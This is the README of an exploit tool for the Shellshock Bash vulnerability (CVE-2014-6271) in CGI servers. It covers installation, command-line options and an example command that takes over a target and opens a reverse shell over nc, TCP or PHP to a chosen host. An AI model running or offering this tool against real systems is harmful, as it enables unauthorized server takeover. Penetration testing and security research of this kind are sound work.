The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system.
- Exploit Automation: Automates the exploitation of the Shellshock vulnerability in CGI scripts, streamlining the process for penetration testing and security research.
- Reverse Shell Connectivity: Provides options for establishing a reverse shell connection to the target server, supporting various methods such as Netcat (nc), TCP, and PHP.
- Customizable Options: Allows users to specify the target host, CGI script, remote host for the reverse shell, port, and preferred shell method through command-line options.
- CVE Number: CVE-2014-6271
- CVE Description: Bash through 4.3 allows remote attackers to execute arbitrary commands via crafted environment variables passed to Bash scripts.
Debian/Ubuntu
sudo apt-get install libcurl4-openssl-dev
Red Hat/Fedora
sudo dnf install libcurl-devel
macOS (Homebrew)
brew install curl-openssl
After installing the libcurl development package, install the CVE-2014-6271-Shellshock:
git clone https://github.com/MY7H404/CVE-2014-6271-Shellshock.git
cd CVE-2014-6271-Shellshock
pip3 install -r requirements.txt
python3 shellshock.py [-h] -a HOST -u URI -r REMOTE -p PORT [-s {nc,tcp,php}]
Warning
Fixing "error: externally-managed-environment" Pip3 Installation Error
pip3 install virtualenv
python3 -m venv myenv
source myenv/bin/activate
pip3 install -r requirements.txt
-h, --help: Show help message and exit
-a HOST, --host HOST: Specify a remote host to test
-u URI, --uri URI: Specify a CGI script to test (e.g., /cgi/test)
-r REMOTE, --remote REMOTE: Specify the host for the reverse shell connection
-p PORT, --port PORT: Specify the port for the reverse shell connection
-s {nc,tcp,php}, --shell {nc,tcp,php}: Choose your preferred reverse shell method for seamless connectivity (default 'nc')
python3 shellshock.py -a 10.10.10.10 -u /cgi/test -r localhost -p 4444 -s tcp
This tool is created for educational and testing purposes only. The authors and contributors are not responsible for any illegal, unethical, or unauthorized use of this tool. Users are solely responsible for ensuring that their use of this tool complies with all applicable laws, regulations, and ethical standards.
Usage of this tool on systems or networks without explicit authorization is strictly prohibited. The authors and contributors disclaim any responsibility for any damage, loss of data, or other consequences resulting from the use of this tool.
By using this tool, you acknowledge that you have read, understood, and agree to abide by the terms of this disclaimer.
Use responsibly and ethically.
This project is licensed under the MIT License.